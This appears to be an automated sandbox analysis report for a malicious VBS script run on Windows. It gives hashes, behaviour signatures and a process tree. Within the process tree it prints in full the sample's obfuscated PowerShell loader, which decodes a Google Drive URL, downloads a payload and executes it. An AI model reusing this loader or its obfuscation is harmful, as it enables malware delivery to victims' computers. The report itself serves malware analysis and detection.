Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29/03/2024, 02:11
Static task
static1
Behavioral task
behavioral1
Sample
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
Resource
win10v2004-20231215-en
General
-
Target
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
-
Size
179KB
-
MD5
9cc4d241f55c4430d7ca7245c585253e
-
SHA1
64497621d3145749d5d5b284448f8d7f90aa3e29
-
SHA256
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612
-
SHA512
4a058df7f657a75287b4d2a5a238469a83df4f160e246ea2240eedcf01bbf3d216a304e6cf0dba218c7a922099e60637e5650fe7f8037d350545939d0168f8f3
-
SSDEEP
3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyc:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVR
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2908 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 18 drive.google.com 19 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1560 4384 WerFault.exe 90 -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2364 powershell.exe 2364 powershell.exe 4384 powershell.exe 4384 powershell.exe 4384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 4384 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2908 wrote to memory of 2364 2908 WScript.exe 85 PID 2908 wrote to memory of 2364 2908 WScript.exe 85 PID 2364 wrote to memory of 4680 2364 powershell.exe 87 PID 2364 wrote to memory of 4680 2364 powershell.exe 87 PID 2364 wrote to memory of 4384 2364 powershell.exe 90 PID 2364 wrote to memory of 4384 2364 powershell.exe 90 PID 2364 wrote to memory of 4384 2364 powershell.exe 90 PID 4384 wrote to memory of 4152 4384 powershell.exe 91 PID 4384 wrote to memory of 4152 4384 powershell.exe 91 PID 4384 wrote to memory of 4152 4384 powershell.exe 91
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^03⤵PID:4680
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^04⤵PID:4152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 26324⤵
- Program crash
PID:1560
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 4384 -ip 43841⤵PID:4460
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD541077e923293898955e78267b7878339
SHA136083128a00b83103bfe8bc36b0042ff6a703012
SHA2564d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0
SHA512070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922
-
Filesize
6KB
MD5a45ba0d9e34080482621cd2538f9b4f8
SHA1d76f3ecbe487e2a2ce081d59966b546811e517dc
SHA2563f76198c3a8aa09768b853a462a13de2c4302761f0c2d34de5f761e59033f471
SHA512a7da77f44be0a7ac8834551b9d3133eb46b65489a1d55df69a3e7039dafcc65d36aeaf5c9efdef4acbe454a852c6c377071c3ce84f47cbdd38eece2d776d8d16
-
Filesize
2KB
MD5431dee567c8386cb30dba8162227f153
SHA1819be3b532ceb44a8f39a795494f822e61c76ec8
SHA2569d6611a404f78948afd12a529462e776b597216139365b3a3f0c0c765e03ff7b
SHA512e33ebdf090896fd82ad1f9f40ba99af5c5dc60763c0e64278dc0b2a94df31ccf326ff51553bd905caf35354968cec268fe2f0022ccaf650061e8dc504113cdc5
-
Filesize
1KB
MD566dbe46189a99a73b9346672d34c3138
SHA12818445ada528c9fd9c04c95369039adde8f6708
SHA25644446099d2fb29ec6c60d5ab1490eeb9f0a35b1e620342c2fb3ea49354bcc61f
SHA512b11b12e3859b2092ea8455af5de1e0e15210325e0ad8bd6a51ef6d1cb0f3925480e73342e1c41320060bbf38adea1e6f135628c8087a6c05b37c0330c1fed6ac
-
Filesize
2KB
MD5d66a3ee0adf3cab478770229c65f1325
SHA17a346f32392b488ff8ffe1e04b418162ee122f69
SHA256aeaf13cb0a80ec05e8aebd26fd84b6c14ee6339dcc6012ffae69b0ac9b483d83
SHA512f38ffb82f54a2d1fd6d833358361879395d0f02860754e1c2dc3bf70d8f572a0a1d757accdd5622071498da32ee2195b57d3c4bba97cd39ce2a8ae86e5e37d07
-
Filesize
1KB
MD56fa3bc0693f9b25f755076e62bd16488
SHA1d77b88b84c54212206c1bb64b53030b72a090b46
SHA25677440d6aa22f460064cdbe56994ea71dfe93ab1db91ec5129095d84a4ccfeaf7
SHA51225e75355d43215518d3f95944d68ac515170a1360cd0ef75cb3cfffb94c0b85749917e219c039fb35a81789f1fcb245e4f9f3172295c65b936abd64e23240d3f
-
Filesize
3KB
MD5574c55c3664ae5736b02b985575ef8fd
SHA1d6a5ae6ec2186d56e429f0d6d9a820a64ea2e5bd
SHA2564187466f21a6a3c69282e6bf476b5d33b13304b7a60f724cc5b0bbb5d0c0aed1
SHA5120e03f11815aa0118369b9f33aea1ba65887130cdc7e7dbd819c4949d0dc38e3a3734395c10f491c25efd7007e80ea205c1944f352e8339ffc46543c9e42468d3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82